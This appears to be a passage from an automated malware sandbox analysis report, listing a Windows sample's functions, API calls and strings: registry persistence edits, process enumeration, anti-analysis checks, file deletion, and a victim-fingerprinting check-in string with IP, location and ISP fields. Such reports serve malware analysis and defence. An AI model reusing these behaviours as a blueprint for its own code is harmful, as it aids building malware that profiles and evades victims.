      • Part of subcall function 00410830: lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410894
      • Part of subcall function 00410830: lstrlen.KERNEL32(178.18.17.204), ref: 004108C2
      • Part of subcall function 00410830: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?), ref: 004108E5
      • Part of subcall function 00410830: lstrlen.KERNEL32(Anonymous Proxy), ref: 004108F6
      • Part of subcall function 00410830: lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410900
      • Part of subcall function 00410830: lstrlen.KERNEL32(Anonymous Proxy), ref: 0041092E
      • Part of subcall function 00410830: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?), ref: 0041094C
      • Part of subcall function 00410830: lstrlen.KERNEL32(FiberMax Networks BV), ref: 00410959
      • Part of subcall function 00410830: lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410963
      • Part of subcall function 00410830: lstrlen.KERNEL32(FiberMax Networks BV), ref: 00410991
      • Part of subcall function 00410830: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?), ref: 004109AF
      • Part of subcall function 00410830: RegCloseKey.ADVAPI32(?), ref: 004109B8
    • GetProcessHeap.KERNEL32 ref: 00410D84
    • RtlFreeHeap.NTDLL ref: 00410D8B
    Strings
    Function 00413680, Relevance: 9.2, APIs: 5, Instructions: 136
    APIs
    Function 004012A0, Relevance: 9.0, APIs: 5, Instructions: 44
    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019), ref: 004012C4
    • RegDeleteValueA.ADVAPI32 ref: 004012E5
    • RegDeleteValueA.ADVAPI32(00000000), ref: 004012F8
    • RegDeleteValueA.ADVAPI32(00000000), ref: 0040130A
    • RegCloseKey.ADVAPI32(00000000), ref: 00401311
    Function 00401220, Relevance: 8.2, APIs: 3, Strings: 3, Instructions: 45
    APIs
    • RegCreateKeyExA.ADVAPI32(00419494,?,00000000,00000000,00000000,00000002,00000000,?,?), ref: 0040125F
    • RegDeleteValueA.ADVAPI32(?,Update), ref: 0040127F
    • RegCloseKey.ADVAPI32(?), ref: 0040128A
    Strings
    Function 00414FF0, Relevance: 7.7, APIs: 5, Instructions: 69
    APIs
    • LocalAlloc.KERNEL32(00000000), ref: 00414FFD
    • memset.NTDLL(?,00000000), ref: 0041501B
    • LocalFree.KERNEL32 ref: 00415042
    • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,71AB676F), ref: 0041508F
    • LocalFree.KERNEL32 ref: 00415098
    Function 004156C0, Relevance: 7.6, APIs: 3, Strings: 3, Instructions: 91
    APIs
    • LocalAlloc.KERNEL32(00000040,00000028), ref: 0041577E
    • LocalFree.KERNEL32 ref: 004157B8
    • LocalAlloc.KERNEL32(00000040,00000008), ref: 004157C9
    Strings
    Function 00411620, Relevance: 7.1, APIs: 3, Strings: 3, Instructions: 75
    APIs
    • memset.NTDLL ref: 00411659
    • wsprintfA.USER32(?,004195A8), ref: 0041166E
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E37
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E3F
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E49
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E54
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E60
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E7A
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E94
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EC8
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EE2
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EFF
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413F1C
      • Part of subcall function 00413DD0: GetModuleHandleW.KERNEL32(00000000), ref: 00413F4C
      • Part of subcall function 00413DD0: strncpy.NTDLL(?,?), ref: 00413F85
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413F95
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413FA3
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413FAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FBD
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FD6
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FEF
    • ExitProcess.KERNEL32(00001B81), ref: 0041169B
      • Part of subcall function 00412660: GetProcessHeap.KERNEL32 ref: 00412677
      • Part of subcall function 00412660: RtlAllocateHeap.NTDLL(?,?,7E418F9C), ref: 0041267A
      • Part of subcall function 00412660: memset.NTDLL(?,00000000), ref: 0041268E
      • Part of subcall function 00412660: ExitProcess.KERNEL32(00001B8B), ref: 004126B6
      • Part of subcall function 00412660: GetProcessHeap.KERNEL32 ref: 004126E9
      • Part of subcall function 00412660: RtlFreeHeap.NTDLL ref: 004126EC
      • Part of subcall function 00412660: lstrlen.KERNEL32 ref: 00412715
      • Part of subcall function 00412660: lstrlen.KERNEL32 ref: 00412737
      • Part of subcall function 00412660: lstrlen.KERNEL32 ref: 00412759
      • Part of subcall function 00412660: GetProcessHeap.KERNEL32 ref: 0041276A
      • Part of subcall function 00412660: RtlFreeHeap.NTDLL ref: 00412771
      • Part of subcall function 00414010: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041401B
      • Part of subcall function 00414010: memset.NTDLL(?,00000000), ref: 0041403E
      • Part of subcall function 00414010: Process32FirstW.KERNEL32(?,?), ref: 00414056
      • Part of subcall function 00414010: lstrcmpiW.KERNEL32(?,0041B01C), ref: 0041407C
      • Part of subcall function 00414010: Process32NextW.KERNEL32(?,?), ref: 00414094
      • Part of subcall function 00414010: CloseHandle.KERNEL32 ref: 004140A0
      • Part of subcall function 004140C0: GetModuleHandleA.KERNEL32(0041B020), ref: 004140D7
    Strings
    Function 00412BF0, Relevance: 6.5, APIs: 4, Instructions: 72
    APIs
    • LocalAlloc.KERNEL32(00000040), ref: 00412C29
    • LocalFree.KERNEL32 ref: 00412C46
    • LocalFree.KERNEL32 ref: 00412C4B
    • LocalAlloc.KERNEL32(00000040,00000008), ref: 00412C5F
    Function 00412CA0, Relevance: 6.1, APIs: 3, Strings: 3, Instructions: 121
    APIs
    • LocalAlloc.KERNEL32(00000040,00000028), ref: 00412D6A
    • LocalFree.KERNEL32 ref: 00412DAB
    • LocalFree.KERNEL32 ref: 00412DB0
      • Part of subcall function 00412BF0: LocalAlloc.KERNEL32(00000040), ref: 00412C29
      • Part of subcall function 00412BF0: LocalFree.KERNEL32 ref: 00412C46
      • Part of subcall function 00412BF0: LocalFree.KERNEL32 ref: 00412C4B
      • Part of subcall function 00412BF0: LocalAlloc.KERNEL32(00000040,00000008), ref: 00412C5F
      • Part of subcall function 00412F60: LocalAlloc.KERNEL32(00000040,00000010), ref: 00412F67
    Strings
    Function 00414CB0, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 49
    APIs
    Strings
    Function 00410E10, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 36
    APIs
    • _vsnprintf.NTDLL(ver=0.0.0.3&subid=6369&os=2600&idx=2206633207&langid=1033&width=800&height=600&ip=178.18.17.204&loc=Anonymous Proxy&isp=FiberMax Networks BV,000003FF,?,?,?,7E418F9C,00412995,?,00000000,00000000,00000000,00000003,000018E1,?,83868CF7), ref: 00410E3A
    Strings
    • ver=0.0.0.3&subid=6369&os=2600&idx=2206633207&langid=1033&width=800&height=600&ip=178.18.17.204&loc=Anonymous Proxy&isp=FiberMax Networks BV, xrefs: 00410E37
    Function 00414D30, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 155
    APIs
      • Part of subcall function 00414CB0: _alldiv.NTDLL ref: 00414CC6
    • memset.NTDLL(?,0000003D), ref: 00414EBD
    Strings
    Function 00412F10, Relevance: 3.8, APIs: 3, Instructions: 27
    APIs
    Function 00410B50, Relevance: 3.5, APIs: 2, Instructions: 43
    APIs
    • strstr.NTDLL ref: 00410B77
    • memcpy.NTDLL(00000507,?,?,?,?,0000001C,?,178.18.17.204,?), ref: 00410B8A
    Function 004175D0, Relevance: 3.3, APIs: 2, Instructions: 134
    APIs
    • LocalAlloc.KERNEL32(00000040,00000058), ref: 004175E3
    • LocalAlloc.KERNEL32(00000040,00000048), ref: 0041762F
    Function 00412B70, Relevance: 3.2, APIs: 2, Instructions: 29
    APIs
    • LocalFree.KERNEL32 ref: 00412B8D
    • LocalFree.KERNEL32 ref: 00412B92
      • Part of subcall function 00412BF0: LocalAlloc.KERNEL32(00000040), ref: 00412C29
      • Part of subcall function 00412BF0: LocalFree.KERNEL32 ref: 00412C46
      • Part of subcall function 00412BF0: LocalFree.KERNEL32 ref: 00412C4B
      • Part of subcall function 00412BF0: LocalAlloc.KERNEL32(00000040,00000008), ref: 00412C5F
    Function 00412AB0, Relevance: 3.0, APIs: 2, Instructions: 9
    APIs
    • SetThreadDesktop.USER32(?), ref: 00412AB9
    • GetModuleHandleW.KERNEL32(00000000), ref: 00412AC1
      • Part of subcall function 00412780: GetModuleHandleW.KERNEL32(00000000), ref: 00412797
      • Part of subcall function 00412780: strncpy.NTDLL(?,?), ref: 004127C7
      • Part of subcall function 00412780: lstrlen.KERNEL32(?), ref: 004127D4
      • Part of subcall function 00412780: CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000003,00000000,00000000), ref: 004127F2
      • Part of subcall function 00412780: ExitProcess.KERNEL32(00000661), ref: 0041281D
      • Part of subcall function 00412780: WSAStartup.WS2_32(00000202,?), ref: 00412830
      • Part of subcall function 00412780: RtlGetLastWin32Error.NTDLL ref: 00412839
      • Part of subcall function 00412780: ExitProcess.KERNEL32(00000663), ref: 00412887
      • Part of subcall function 00412780: SetTimer.USER32(00000000,00000000,0000000A,00413B80), ref: 004128B2
      • Part of subcall function 00412780: RtlGetLastWin32Error.NTDLL ref: 004128C2
      • Part of subcall function 00412780: ExitProcess.KERNEL32(00000001), ref: 004128D7
      • Part of subcall function 00412780: memset.NTDLL(?,00000000), ref: 004128FD
      • Part of subcall function 00412780: GetVersionExW.KERNEL32(?), ref: 00412912
      • Part of subcall function 00412780: GetSystemDefaultLangID.KERNEL32(?,?,00000001), ref: 00412933
      • Part of subcall function 00412780: GetSystemMetrics.USER32(00000000), ref: 00412944
      • Part of subcall function 00412780: GetSystemMetrics.USER32(00000001), ref: 0041294A
      • Part of subcall function 00412780: RtlGetLastWin32Error.NTDLL ref: 0041299C
      • Part of subcall function 00412780: GetModuleHandleW.KERNEL32(00000000), ref: 004129B8
      • Part of subcall function 00412780: LocalAlloc.KERNEL32(00000040,000000D4), ref: 004129DA
      • Part of subcall function 00412780: LocalAlloc.KERNEL32(00000040,00000008), ref: 004129F9
      • Part of subcall function 00412780: GetSystemMetrics.USER32(00000000), ref: 00412A0C
      • Part of subcall function 00412780: GetSystemMetrics.USER32(00000001), ref: 00412A12
      • Part of subcall function 00412780: UnregisterClassW.USER32(59FFB769-5787-4181-A4F0-949BF67A7793,00400000), ref: 00412A82
      • Part of subcall function 00412780: OleUninitialize.OLE32 ref: 00412A88
    Function 004140C0, Relevance: 2.8, APIs: 1, Instructions: 21
    APIs
    • GetModuleHandleA.KERNEL32(0041B020), ref: 004140D7
    Function 00416BD0, Relevance: 2.6, APIs: 2, Instructions: 129
    APIs
    Function 00416D20, Relevance: 2.6, APIs: 2, Instructions: 56
    APIs
    Function 004174B0, Relevance: 2.5, APIs: 2, Instructions: 26
    APIs
    Function 00418889, Relevance: 1.7, APIs: 1, Instructions: 195
    APIs
    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?), ref: 0041893A
    Function 00412F60, Relevance: 1.7, APIs: 1, Instructions: 39
    APIs
    • LocalAlloc.KERNEL32(00000040,00000010), ref: 00412F67
    Function 00412BC0, Relevance: 1.7, APIs: 1, Instructions: 20
    APIs
    Function 00416790, Relevance: 1.6, APIs: 1, Instructions: 97
    APIs
    • CoTaskMemAlloc.OLE32(0000004A), ref: 004168FD
    Function 004165E0, Relevance: 1.5, APIs: 1, Instructions: 44
    APIs
    • GetWindowRect.USER32(?,?), ref: 00416615
    Function 00418774, Relevance: 1.5, APIs: 1, Instructions: 18
    APIs
    • RtlUnwind.NTDLL(004186D9,0041878C,00000000,00000000,?,?,?,?,?,004186D9), ref: 00418787
    Function 00417BA0, Relevance: 1.3, APIs: 1, Instructions: 32
    APIs
    Function 004155C0, Relevance: 1.3, APIs: 1, Instructions: 17
    APIs
    Function 00417B80, Relevance: 1.3, APIs: 1, Instructions: 11
    APIs
    Function 00412580, Relevance: 1.3, APIs: 1, Instructions: 10
    APIs
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 00411277
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 004112AA
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 004112E3
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 0041131C
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 00411355
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 0041138E
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 004113C7
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 00411400
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 00411439
      • Part of subcall function 004111D0: DeleteFileW.KERNEL32(00000000), ref: 00411472
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 00411494
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 0041149D
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004114BF
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004114C8
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004114EA
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004114F3
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 00411515
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 0041151E
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 00411540
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 00411549
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 0041156B
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 00411574
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 00411596
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 0041159F
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004115C1
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004115CA
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004115E6
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 004115EC
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 00411605
      • Part of subcall function 004111D0: LocalFree.KERNEL32 ref: 0041160B
    • LocalFree.KERNEL32 ref: 00412590
    Function 00417500, Relevance: 1.3, APIs: 1, Instructions: 10
    APIs
    Function 004156A0, Relevance: 1.3, APIs: 1, Instructions: 10
    APIs
    Function 00417520, Relevance: 1.3, APIs: 1, Instructions: 10
    APIs
    Function 00417410, Relevance: 1.3, APIs: 1, Instructions: 10
    APIs

    Analysis Process: cmd.exe PID: 424 Parent PID: 576

    Executed Functions
    Non-executed Functions